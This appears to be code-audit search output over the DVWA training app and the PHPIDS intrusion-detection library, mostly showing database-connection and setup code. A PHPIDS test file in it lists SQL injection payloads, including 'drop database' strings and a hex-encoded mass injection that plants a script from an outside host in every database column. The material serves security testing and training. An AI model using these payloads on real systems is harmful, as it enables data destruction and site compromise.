./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/URIFilter/Munge.php:23 (21/29) OK | Dubious | Bad | Hide 
20-        
21-        $scheme_obj = $uri->getSchemeObj($config, $context);
22-        if (!$scheme_obj) return true; // ignore unknown schemes, maybe another postfilter did it
23:        if (is_null($uri->host) || empty($scheme_obj->browsable)) {
24-            return true;
25-        }
26-
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/URIFilter/Munge.php:32 (22/29) OK | Dubious | Bad | Hide 
29-        
30-        $new_uri = strtr($this->target, $this->replace);
31-        $new_uri = $this->parser->parse($new_uri);
32:        // don't redirect if the target host is the same as the 
33:        // starting host
34:        if ($uri->host === $new_uri->host) return true;
35-        $uri = $new_uri; // overwrite
36-        return true;
37-    }
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/URIFilter/DisableExternal.php:8 (23/29) OK | Dubious | Bad | Hide 
5-    public $name = 'DisableExternal';
6-    protected $ourHostParts = false;
7-    public function prepare($config) {
8:        $our_host = $config->getDefinition('URI')->host;
9:        if ($our_host !== null) $this->ourHostParts = array_reverse(explode('.', $our_host));
10-    }
11-    public function filter(&$uri, $config, $context) {
12:        if (is_null($uri->host)) return true;
13-        if ($this->ourHostParts === false) return false;
14:        $host_parts = array_reverse(explode('.', $uri->host));
15-        foreach ($this->ourHostParts as $i => $x) {
16:            if (!isset($host_parts[$i])) return false;
17:            if ($host_parts[$i] != $this->ourHostParts[$i]) return false;
18-        }
19-        return true;
20-    }
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/URIScheme/mailto.php:19 (24/29) OK | Dubious | Bad | Hide 
16-    public function validate(&$uri, $config, $context) {
17-        parent::validate($uri, $config, $context);
18-        $uri->userinfo = null;
19:        $uri->host     = null;
20-        $uri->port     = null;
21-        // we need to validate path against RFC 2368's addr-spec
22-        return true;
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/URIScheme/news.php:13 (25/29) OK | Dubious | Bad | Hide 
10-    public function validate(&$uri, $config, $context) {
11-        parent::validate($uri, $config, $context);
12-        $uri->userinfo = null;
13:        $uri->host     = null;
14-        $uri->port     = null;
15-        $uri->query    = null;
16-        // typecode check needed on path
./dvwa/includes/dvwaPage.inc.php:547 (26/29) OK | Dubious | Bad | Hide 
544-	
545-	elseif ($DBMS == 'PGSQL') {
546-
547:		$dbconn = pg_connect("host=".$_DVWA[ 'db_server' ]." dbname=".$_DVWA[ 'db_database' ]." user=".$_DVWA[ 'db_user' ]." password=".$_DVWA[ 'db_password' ])
548-		or die( $DBMS_connError );
549-
550-	}
./dvwa/includes/DBMS/PGSQL.php:10 (27/29) OK | Dubious | Bad | Hide 
7-*/
8-
9-// Connect to server
10:if ( !@pg_connect("host=".$_DVWA[ 'db_server' ]." port=".$_DVWA[ 'db_port' ]." user=".$_DVWA[ 'db_user' ]." password=".$_DVWA[ 'db_password' ]) ) {
11-	dvwaMessagePush( "Could not connect to the database - please check the config file." );
12-	dvwaPageReload();
13-}
./dvwa/includes/DBMS/PGSQL.php:34 (28/29) OK | Dubious | Bad | Hide 
31-
32-
33-// Connect to server AND connect to the database
34:$dbconn = @pg_connect("host=".$_DVWA[ 'db_server' ]." port=".$_DVWA[ 'db_port' ]." dbname=".$_DVWA[ 'db_database' ]." user=".$_DVWA[ 'db_user' ]." password=".$_DVWA[ 'db_password' ]);
35-	
36-	
37-// Create table 'users'
./dvwa/includes/DBMS/DBMS.php:84 (29/29) OK | Dubious | Bad | Hide 
81-	}
82-	
83-	elseif ($DBMS == 'PGSQL') {
84:		$dbconn = @pg_connect("host=".$_DVWA[ 'db_server' ]." port=".$_DVWA[ 'db_port' ]." dbname=".$_DVWA[ 'db_database' ]." user=".$_DVWA[ 'db_user' ]." password=".$_DVWA[ 'db_password' ]) 
85-		or die( $DBMS_connError );
86-	}
87-}

database (26) Top | Hide

./config/config.inc.php:3 (1/26) OK | Dubious | Bad | Hide 
2-
3:# If you are having problems connecting to the MySQL database and all of the variables below are correct
4-# try changing the 'db_server' variable from localhost to 127.0.0.1. Fixes a problem due to sockets.
5-# Thanks to digininja for the fix.
6-
./config/config.inc.php:16 (2/26) OK | Dubious | Bad | Hide 
13-
14-$_DVWA = array();
15-$_DVWA[ 'db_server' ] = 'localhost';
16:$_DVWA[ 'db_database' ] = 'dvwa';
17-$_DVWA[ 'db_user' ] = 'root';
18-$_DVWA[ 'db_password' ] = '';
19-
./vulnerabilities/sqli_blind/help/help.php:9 (3/26) OK | Dubious | Bad | Hide 
6-	<tr>
7-	<td><div id="code">
8-
9:		<p>When an attacker executes SQL Injection attacks, sometimes the server responds with error messages from the database server complaining that the SQL Query's syntax is incorrect. 
10-		Blind SQL injection is identical to normal SQL Injection except that when an attacker attempts to exploit an application, rather then getting a useful error message, 
11-		they get a generic page specified by the developer instead. This makes exploiting a potential SQL Injection attack more difficult but not impossible. An attacker can still steal data 
12-		by asking a series of True and False questions through SQL statements.</p>
13-		
14-		<p>The 'id' variable within this PHP script is vulnerable to SQL injection.</p>
15-		
16:		<p>There are 5 users in the database, with id's from 1 to 5. Your mission... to steal passwords!</p>
17-		
18-		<p>If you have received a Magicquotes error, turn them off in php.ini.</p>
19-
./vulnerabilities/sqli/help/help.php:10 (4/26) OK | Dubious | Bad | Hide 
7-	<td><div id="code">
8-
9-		<p>A SQL injection attack consists of insertion or "injection" of a SQL query via the input data from the client to the application. 
10:		A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database 
11-		(such as shutdown the DBMS), recover the content of a given file present on the DBMS file system and in some cases issue commands to the operating system. SQL injection attacks are a 
12-		type of  injection attack, in which SQL commands are injected into data-plane input in order to effect the execution of predefined SQL commands. </p>
13-		
14-		<p>The 'id' variable within this PHP script is vulnerable to SQL injection.</p>
15-		
16:		<p>There are 5 users in the database, with id's from 1 to 5. Your mission... to steal passwords!</p>
17-		
18-		<p>If you have received a Magicquotes error, turn them off in php.ini.</p>
19-
./vulnerabilities/xss_s/help/help.php:17 (5/26) OK | Dubious | Bad | Hide 
14-		Because it thinks the script came from a trusted source, the malicious script can access any cookies, session tokens, or other sensitive information retained by your browser and used with 
15-		that site. These scripts can even rewrite the content of the HTML page. </p>
16-		
17:		<p>The XSS payload is stored in the database. The XSS is permanent until the database is reset or the payload is manually deleted.</p>
18-		
19-	</div></td>
20-	</tr>
./external/phpids/0.6/docs/examples/cakephp/ids.php:182 (6/26) OK | Dubious | Bad | Hide 
179-
180-    /**
181-     * This function writes an entry about the intrusion
182:     * to the intrusion database
183-     *
184-     * @param array $results
185-     * @return boolean
./external/phpids/0.6/tests/IDS/MonitorTest.php:731 (7/26) OK | Dubious | Bad | Hide 
728-        $exploits[] = "abc' = !0 != !!!'0";
729-        $exploits[] = "abc' = !+0 != !'0 ";
730-        $exploits[] = "aa'=+'1";
731:        $exploits[] = "';if 1=1 drop database test-- -a";
732-        $exploits[] = "';if 1=1 drop table users-- -a";
733-        $exploits[] = "';if 1=1 shutdown-- -a";
734-        $exploits[] = "'; while 1=1 shutdown-- -a";
./external/phpids/0.6/lib/IDS/Caching/Database.php:40 (8/26) OK | Dubious | Bad | Hide 
37- * Needed SQL:
38- *
39-
40:    #create the database
41-
42-    CREATE DATABASE IF NOT EXISTS `phpids` DEFAULT CHARACTER 
43-        SET utf8 COLLATE utf8_general_ci;
./external/phpids/0.6/lib/IDS/Caching/Database.php:59 (9/26) OK | Dubious | Bad | Hide 
56-/**
57- * Database caching wrapper
58- *
59: * This class inhabits functionality to get and set cache via a database.
60- *
61- * @category  Security
62- * @package   PHPIDS
./external/phpids/0.6/lib/IDS/Caching/Database.php:106 (10/26) OK | Dubious | Bad | Hide 
103-    /**
104-     * Constructor
105-     *
106:     * Connects to database.
107-     *
108-     * @param string $type caching type
109-     * @param array  $init the IDS_Init object
./external/phpids/0.6/lib/IDS/Caching/Database.php:139 (11/26) OK | Dubious | Bad | Hide 
136-    }
137-
138-    /**
139:     * Writes cache data into the database
140-     *
141-     * @param array $data the caching data
142-     *
./external/phpids/0.6/lib/IDS/Caching/Database.php:202 (12/26) OK | Dubious | Bad | Hide 
199-    }
200-
201-    /**
202:     * Connect to database and return a handle
203-     *
204-     * @return object dbh
205-     * @throws PDOException if a db error occurred
./external/phpids/0.6/lib/IDS/Caching/Database.php:238 (13/26) OK | Dubious | Bad | Hide 
235-    /**
236-     * Write the cache data to the table
237-     * 
238:     * @param object $handle the database handle
239-     * @param array  $data   the caching data
240-     * 
241-     * @return object dbh
./external/phpids/0.6/lib/IDS/Log/Database.php:61 (14/26) OK | Dubious | Bad | Hide 
58-/**
59- * Database logging wrapper
60- *
61: * The database wrapper is designed to store reports into an sql database. It 
62- * implements the singleton pattern and is based in PDO, supporting 
63: * different database types.
64- *
65- * @category  Security
66- * @package   PHPIDS
./external/phpids/0.6/lib/IDS/Log/Database.php:131 (15/26) OK | Dubious | Bad | Hide 
128-     * Instance container
129-     *
130-     * Due to the singleton pattern this class allows to initiate only one instance
131:     * for each database wrapper.
132-     *
133-     * @var array
134-     */
./external/phpids/0.6/lib/IDS/Log/Database.php:239 (16/26) OK | Dubious | Bad | Hide 
236-    }
237-
238-    /**
239:     * Stores given data into the database
240-     *
241-     * @param object $data IDS_Report instance
242-     *
./setup.php:21 (17/26) OK | Dubious | Bad | Hide 
18-		include_once DVWA_WEB_PAGE_TO_ROOT.'dvwa/includes/DBMS/PGSQL.php';
19-	}
20-	else {
21:		dvwaMessagePush( "ERROR: Invalid database selected. Please review the config file syntax." );
22-		dvwaPageReload();
23-	}
24-
./setup.php:32 (18/26) OK | Dubious | Bad | Hide 
29-<div class=\"body_padded\">
30-	<h1>Database setup <img src=\"".DVWA_WEB_PAGE_TO_ROOT."dvwa/images/spanner.png\"></h1>
31-
32:	<p>Click on the 'Create / Reset Database' button below to create or reset your database. If you get an error make sure you have the correct user credentials in /config/config.inc.php</p>
33-
34:	<p>If the database already exists, it will be cleared and the data will be reset.</p>
35-
36-	<br />
37-
./dvwa/includes/dvwaPage.inc.php:526 (19/26) OK | Dubious | Bad | Hide 
523-
524-$DBMS_connError = '<div align="center">
525-		<img src="'.DVWA_WEB_PAGE_TO_ROOT.'dvwa/images/logo.png">
526:		<pre>Unable to connect to the database.<br>'.$DBMS_errorFunc.'<br /><br /></pre>
527:		Click <a href="'.DVWA_WEB_PAGE_TO_ROOT.'setup.php">here</a> to setup the database.
528-		</div>';
529-
530-function dvwaDatabaseConnect() {
./dvwa/includes/dvwaPage.inc.php:539 (20/26) OK | Dubious | Bad | Hide 
536-	if ($DBMS == 'MySQL') {
537-
538-		if( !@mysql_connect( $_DVWA[ 'db_server' ], $_DVWA[ 'db_user' ], $_DVWA[ 'db_password' ] )
539:		|| !@mysql_select_db( $_DVWA[ 'db_database' ] ) ) {
540-			die( $DBMS_connError );
541-		}
542-
./dvwa/includes/dvwaPage.inc.php:547 (21/26) OK | Dubious | Bad | Hide 
544-	
545-	elseif ($DBMS == 'PGSQL') {
546-
547:		$dbconn = pg_connect("host=".$_DVWA[ 'db_server' ]." dbname=".$_DVWA[ 'db_database' ]." user=".$_DVWA[ 'db_user' ]." password=".$_DVWA[ 'db_password' ])
548-		or die( $DBMS_connError );
549-
550-	}
./dvwa/includes/DBMS/PGSQL.php:5 (22/26) OK | Dubious | Bad | Hide 
2-
3-/*
4-
5:This file contains all of the code to setup the initial PostgreSQL database. (setup.php)
6-
7-*/
8-
9-// Connect to server
10-if ( !@pg_connect("host=".$_DVWA[ 'db_server' ]." port=".$_DVWA[ 'db_port' ]." user=".$_DVWA[ 'db_user' ]." password=".$_DVWA[ 'db_password' ]) ) {
11:	dvwaMessagePush( "Could not connect to the database - please check the config file." );
12-	dvwaPageReload();
13-}
14-
15:// Create database
16-$drop_db = "DROP DATABASE IF EXISTS dvwa;";
17-
18-if( !@pg_query($drop_db) ) {
19:	dvwaMessagePush( "Could not drop existing database<br />SQL: " . pg_last_error() );
20-	dvwaPageReload();
21-}
22-
23-$create_db = "CREATE DATABASE dvwa;";
24-
25-if( !@pg_query ( $create_db ) ) {
26:	dvwaMessagePush( "Could not create database<br />SQL: " . pg_last_error() );
27-	dvwaPageReload();
28-}
29-
30-dvwaMessagePush( "Database has been created." );
31-
32-
33:// Connect to server AND connect to the database
34:$dbconn = @pg_connect("host=".$_DVWA[ 'db_server' ]." port=".$_DVWA[ 'db_port' ]." dbname=".$_DVWA[ 'db_database' ]." user=".$_DVWA[ 'db_user' ]." password=".$_DVWA[ 'db_password' ]);
35-	
36-	
37-// Create table 'users'
./dvwa/includes/DBMS/DBMS.php:5 (23/26) OK | Dubious | Bad | Hide 
2-
3-/*
4-
5:This file contains all of the database management code for DVWA.
6:All code related to database management should be kept in here.
7-
8-*/
9-
./dvwa/includes/DBMS/DBMS.php:67 (24/26) OK | Dubious | Bad | Hide 
64-
65-$DBMS_connError = '<div align="center">
66-		<img src="'.DVWA_WEB_PAGE_TO_ROOT.'dvwa/images/logo.png">
67:		<pre>Unable to connect to the database.<br>'.$DBMS_errorFunc.'<br /><br /></pre>
68:		Click <a href="'.DVWA_WEB_PAGE_TO_ROOT.'setup.php">here</a> to setup the database.
69-		</div>';
70-		
71-function dvwaDatabaseConnect() {
./dvwa/includes/DBMS/DBMS.php:78 (25/26) OK | Dubious | Bad | Hide 
75-
76-	if ($DBMS == 'MySQL') {
77-		if( !@mysql_connect( $_DVWA[ 'db_server' ], $_DVWA[ 'db_user' ], $_DVWA[ 'db_password' ] )
78:		|| !@mysql_select_db( $_DVWA[ 'db_database' ] ) ) {
79-			die( $DBMS_connError );
80-		}
81-	}
82-	
83-	elseif ($DBMS == 'PGSQL') {
84:		$dbconn = @pg_connect("host=".$_DVWA[ 'db_server' ]." port=".$_DVWA[ 'db_port' ]." dbname=".$_DVWA[ 'db_database' ]." user=".$_DVWA[ 'db_user' ]." password=".$_DVWA[ 'db_password' ]) 
85-		or die( $DBMS_connError );
86-	}
87-}
./dvwa/includes/DBMS/MySQL.php:5 (26/26) OK | Dubious | Bad | Hide 
2-
3-/*
4-
5:This file contains all of the code to setup the initial MySQL database. (setup.php)
6-
7-*/
8-
9-if( !@mysql_connect( $_DVWA[ 'db_server' ], $_DVWA[ 'db_user' ], $_DVWA[ 'db_password' ] ) ) {
10:	dvwaMessagePush( "Could not connect to the database - please check the config file." );
11-	dvwaPageReload();
12-}
13-
14:// Create database
15-$drop_db = "DROP DATABASE IF EXISTS dvwa;";
16-if( !@mysql_query ( $drop_db ) ) {
17:	dvwaMessagePush( "Could not drop existing database<br />SQL: ".mysql_error() );
18-	dvwaPageReload();
19-}
20-
21-$create_db = "CREATE DATABASE dvwa;";
22-
23-if( !@mysql_query ( $create_db ) ) {
24:	dvwaMessagePush( "Could not create database<br />SQL: ".mysql_error() );
25-	dvwaPageReload();
26-}
27-
28-dvwaMessagePush( "Database has been created." );
29-
30-// Create table 'users'
31:if( !@mysql_select_db( $_DVWA[ 'db_database' ] ) ) {
32:	dvwaMessagePush( 'Could not connect to database.' );
33-	dvwaPageReload();
34-}
35-

MD5 (1) Top | Hide

./external/phpids/0.6/tests/IDS/MonitorTest.php:908 (1/1) OK | Dubious | Bad | Hide 
906-        $exploits[] = "asd' union distinct(select null,password,null from users)--a ";
907-        $exploits[] = "asd' union distinct ( select null,password,(null)from user )-- a ";
908:        $exploits[] = 'DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S);';
909-        $exploits[] = "asaa';SELECT[asd]FROM[asd]";
910-        $exploits[] = "asd'; select [column] from users ";
911-        $exploits[] = "0x31 union select @@version,username,password from users ";

SHA1 (1) Top | Hide

./external/phpids/0.6/tests/IDS/MonitorTest.php:908 (1/1) OK | Dubious | Bad | Hide 
906-        $exploits[] = "asd' union distinct(select null,password,null from users)--a ";
907-        $exploits[] = "asd' union distinct ( select null,password,(null)from user )-- a ";
908:        $exploits[] = 'DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S);';
909-        $exploits[] = "asaa';SELECT[asd]FROM[asd]";
910-        $exploits[] = "asd'; select [column] from users ";
911-        $exploits[] = "0x31 union select @@version,username,password from users ";